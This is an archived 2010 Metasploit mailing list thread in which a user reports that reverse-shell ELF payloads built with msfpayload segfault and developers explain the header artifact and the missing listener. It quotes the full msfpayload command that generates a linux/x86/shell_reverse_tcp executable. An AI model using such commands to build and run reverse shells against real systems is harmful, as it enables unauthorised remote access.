Metasploit mailing list archives
Re: Linux payloads broken
From: egypt () metasploit com
Date: Fri, 7 May 2010 12:06:53 -0600
The "corrupt" headers are an artifact of how we create ELF executables. If you want to see how that works look at data/templates/src/elf/exe/elf_template.s When I run an elf generated with the same command you posted under strace, it clearly calls socket() and connect() before dying. When a listener is waiting to accept that connection, it works fine. The segfault you're seeing, as Ramon and Florian have pointed out, is due to a failed connect. Hope this helped, egypt On Fri, May 7, 2010 at 9:00 AM, Konrads Smelkovs <konrads () smelkovs com> wrote:
Strace shows that it segfaults before any syscalls are placed. furthermore, it appears that exec headers are corrupt. wether I have listener or not on the other end doesn't matter. -- Konrads Smelkovs Applied IT sorcery. On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle <ramon () metasploit com> wrote:Did you set a listener on the selected port? -Ramon On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Ā Length: 71 Options: LHOST=127.0.0.1,LPORT=80 konrads@konrads-laptop:~/msf2$ file out.elf out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, *corrupted section header size* konrads@konrads-laptop:~/msf2$ chmod +x out.elf konrads@konrads-laptop:~/msf2$ ./out.elf *Segmentation fault* konrads@konrads-laptop:~/msf2$ uname -a Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09 UTC 2010 i686 GNU/Linux Same for metsvc_reverse_tcp payload -- Konrads Smelkovs Applied IT sorcery. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Florian Roth (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken egypt (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 08)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)